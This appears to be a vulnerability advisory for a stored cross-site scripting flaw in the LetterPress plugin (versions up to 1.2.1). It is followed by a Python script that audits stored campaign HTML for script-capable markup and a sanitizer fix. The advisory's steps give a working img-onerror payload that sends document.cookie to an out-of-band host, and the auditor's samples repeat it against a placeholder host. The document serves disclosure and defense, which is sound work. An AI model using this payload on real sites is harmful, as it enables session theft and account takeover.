/LetterPress-1.2.1-Cookie-Stealing-Vulnerability

LetterPress plugin versions <= 1.2.1 are affected by a Cookie Stealing Vulnerability. An attacker can steal cookies by injecting JavaScript code.

License: GNU General Public License v3.0 (GPL-3.0)

Exploit Title: LetterPress <= 1.2.1 - Cookie Stealing Vulnerability

Exploit Author: P.L.Sanu

CVE:

CVSS:

References:

Description:

LetterPress plugin versions <= 1.2.1 are affected by a Cookie Stealing Vulnerability. An attacker can steal cookies by injecting JavaScript code.

Exploit:

  1. In the LetterPress plugin, navigate to Add Campaign, insert the code "<img src=x onerror="location.href='https://masdctnkppwsmnzsddestjmlhih74l9tt.oast.fun?c='+ document.cookie">" in the HTML Campaign Message input field, and click Save Campaign.
  2. View the campaign and monitor the requests and responses on the third-party site (e.g. Burp Collaborator).
  3. The cookie values are passed in a GET parameter to the third-party site.
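
A defensive check for the stored payload described in the steps above, as an added example that is not part of the original advisory or the plugin's code: it parses campaign HTML and flags inline event handlers, script-capable URLs and elements that do not belong in a newsletter body. It covers more than the single `onerror` case; the sample campaigns, the `collector.example` and `shop.example` hosts and all function names are constructed for illustration.

```python
from html.parser import HTMLParser

# Attributes whose value the browser treats as a URL.
URL_ATTRS = {"href", "src", "action", "formaction", "data"}
# Elements with no place in a campaign message (assumed policy for this example).
BLOCKED_TAGS = {"script", "iframe", "object", "embed", "base"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:text/html")


class CampaignAuditor(HTMLParser):
    """Collects (line, tag, kind, detail) for markup that can run script."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases names and decodes entities in attribute values.
        line, _ = self.getpos()
        if tag in BLOCKED_TAGS:
            self.findings.append((line, tag, "blocked-element", tag))
        for name, value in attrs:
            if name.startswith("on"):  # onerror, onload, onclick, ...
                self.findings.append((line, tag, "event-handler", name))
            elif name in URL_ATTRS:
                # Drop whitespace/control characters before checking the scheme.
                url = "".join(c for c in (value or "") if c > " ").lower()
                if url.startswith(SCRIPT_SCHEMES):
                    self.findings.append((line, tag, "script-url", name))


def audit_campaign_html(markup):
    """Return the findings for one stored campaign message."""
    auditor = CampaignAuditor()
    auditor.feed(markup)
    auditor.close()
    return auditor.findings


# Constructed sample campaigns (not taken from a real site).
SAMPLES = {
    "benign": '<h1>Spring sale</h1><p><a href="https://shop.example/sale">More</a></p>',
    "onerror": "<img src=x onerror=\"location.href='https://collector.example/?c='+document.cookie\">",
    "js-url": '<a href="JavaScript:void(0)">open</a>',
}

if __name__ == "__main__":
    for label, markup in SAMPLES.items():
        print(label, audit_campaign_html(markup) or "clean")
```

A scan like this is for auditing campaigns that are already stored. The fix in the plugin is to pass the campaign message through an allowlist sanitizer such as WordPress's `wp_kses_post()` before it is saved and rendered.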